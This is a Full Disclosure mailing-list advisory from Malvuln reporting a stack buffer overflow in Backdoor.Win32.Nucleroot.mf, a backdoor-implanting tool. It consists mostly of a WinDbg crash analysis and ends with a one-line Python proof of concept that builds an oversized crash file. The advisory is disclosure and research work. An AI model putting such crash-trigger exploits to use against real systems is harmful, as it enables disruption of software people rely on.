[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAAHK0WScpjFKGkzu23U9TZ7J4npmx-pg31T_VSMc-rH4c6YDZw@mail.gmail.com>
Date: Sat, 11 Dec 2021 16:19:42 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Nucleroot.mf / Stack Buffer Overflow
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/8de56eef118187a89eeab972288ce94d.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Nucleroot.mf
Vulnerability: Stack Buffer Overflow
Description: Description: MaskPE by yzkzero is a tool for implanting
backdoors in existing PE files. The Backdoor tool doesnt properly check the
files it loads and falls victim to a file based local buffer overflow.
Type: PE32
MD5: 8de56eef118187a89eeab972288ce94d
Vuln ID: MVID-2021-0420
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 12/11/2021
Memory Dump:
(1790.60): Access violation - code c0000005 (first/second chance not
available)
eax=00000000 ebx=00000000 ecx=41414141 edx=41414101 esi=00000003
edi=00000003
eip=7770ed3c esp=0019e7a8 ebp=0019e938 iopl=0 nv up ei pl nz na po
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00200202
ntdll!ZwWaitForMultipleObjects+0xc:
7770ed3c c21400 ret 14h
0:000> .ecxr
eax=454e4141 ebx=771fb900 ecx=41414141 edx=41414101 esi=0019fbe8
edi=0019fbe8
eip=004090e3 esp=0019f0c8 ebp=025a43e8 iopl=0 nv up ei pl nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00210206
*** WARNING: Unable to verify checksum for
Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
*** ERROR: Module load completed but symbols could not be loaded for
Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
Backdoor_Win32_Nucleroot_mf+0x90e3:
004090e3 813850450000 cmp dword ptr [eax],4550h
ds:002b:454e4141=????????
0:000> !analyze -v
*******************************************************************************
*
*
* Exception Analysis
*
*
*
*******************************************************************************
FAULTING_IP:
Backdoor_Win32_Nucleroot_mf+90e3
004090e3 813850450000 cmp dword ptr [eax],4550h
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 004090e3 (Backdoor_Win32_Nucleroot_mf+0x000090e3)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 454e4141
Attempt to read from address 454e4141
PROCESS_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 454e4141
READ_ADDRESS: 454e4141
FOLLOWUP_IP:
Backdoor_Win32_Nucleroot_mf+90e3
004090e3 813850450000 cmp dword ptr [eax],4550h
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAULTING_THREAD: 00000060
BUGCHECK_STR:
APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141
LAST_CONTROL_TRANSFER: from 004049b2 to 004090e3
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
0019f0c8 004049b2 00000001 0019fb74 0019f438
Backdoor_Win32_Nucleroot_mf+0x90e3
0019fc1c 77408654 000000b8 00000000 026a1600
Backdoor_Win32_Nucleroot_mf+0x49b2
0042fba0 00403690 004012a0 00420e01 0042167d
kernel32!BaseThreadInitThunk+0x24
0042fba8 00420e01 0042167d 004255fe 0042565f
Backdoor_Win32_Nucleroot_mf+0x3690
0042fbac 0042167d 004255fe 0042565f 00425604
Backdoor_Win32_Nucleroot_mf+0x20e01
0042fbb0 004255fe 0042565f 00425604 00425604
Backdoor_Win32_Nucleroot_mf+0x2167d
0042fbb4 0042565f 00425604 00425604 00425607
Backdoor_Win32_Nucleroot_mf+0x255fe
0042fbb8 00425604 00425604 00425607 004021b0
Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbbc 00425604 00425607 004021b0 00425664
Backdoor_Win32_Nucleroot_mf+0x25604
0042fbc0 00425607 004021b0 00425664 00425615
Backdoor_Win32_Nucleroot_mf+0x25604
0042fbc4 004021b0 00425664 00425615 00425659
Backdoor_Win32_Nucleroot_mf+0x25607
0042fbc8 00425664 00425615 00425659 00421982
Backdoor_Win32_Nucleroot_mf+0x21b0
0042fbcc 00425615 00425659 00421982 0042561b
Backdoor_Win32_Nucleroot_mf+0x25664
0042fbd0 00425659 00421982 0042561b 00425655
Backdoor_Win32_Nucleroot_mf+0x25615
0042fbd4 00421982 0042561b 00425655 0042565f
Backdoor_Win32_Nucleroot_mf+0x25659
0042fbd8 0042561b 00425655 0042565f 0042565f
Backdoor_Win32_Nucleroot_mf+0x21982
0042fbdc 00425655 0042565f 0042565f 0042565f
Backdoor_Win32_Nucleroot_mf+0x2561b
0042fbe0 0042565f 0042565f 0042565f 00420d33
Backdoor_Win32_Nucleroot_mf+0x25655
0042fbe4 0042565f 0042565f 00420d33 00422195
Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbe8 0042565f 00420d33 00422195 0042214c
Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbec 00420d33 00422195 0042214c 00423e5e
Backdoor_Win32_Nucleroot_mf+0x2565f
0042fcec 00420d4d 00420d33 00690053 0065007a
Backdoor_Win32_Nucleroot_mf+0x20d33
0042fcf0 00420d33 00690053 0065007a 0066004f
Backdoor_Win32_Nucleroot_mf+0x20d4d
0042fcf4 00690053 0065007a 0066004f 006d0049
Backdoor_Win32_Nucleroot_mf+0x20d33
0042fcf8 0065007a 0066004f 006d0049 00670061 0x690053
0042fcfc 0066004f 006d0049 00670061 00000065 0x65007a
0042fd00 006d0049 00670061 00000065 00610042 0x66004f
0042fd04 00670061 00000065 00610042 00650073 0x6d0049
0042fd08 00000000 00610042 00650073 0066004f 0x670061
STACK_COMMAND: ~0s; .ecxr ; kb
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: Backdoor_Win32_Nucleroot_mf+90e3
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Backdoor_Win32_Nucleroot_mf
IMAGE_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
DEBUG_FLR_IMAGE_TIMESTAMP: 4456df74
FAILURE_BUCKET_ID:
STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d!Unknown
BUCKET_ID:
APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_Nucleroot_mf+90e3
Exploit/PoC:
python -c "print( 'MZ'+'A'*20000)" > DOOM.exe
Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists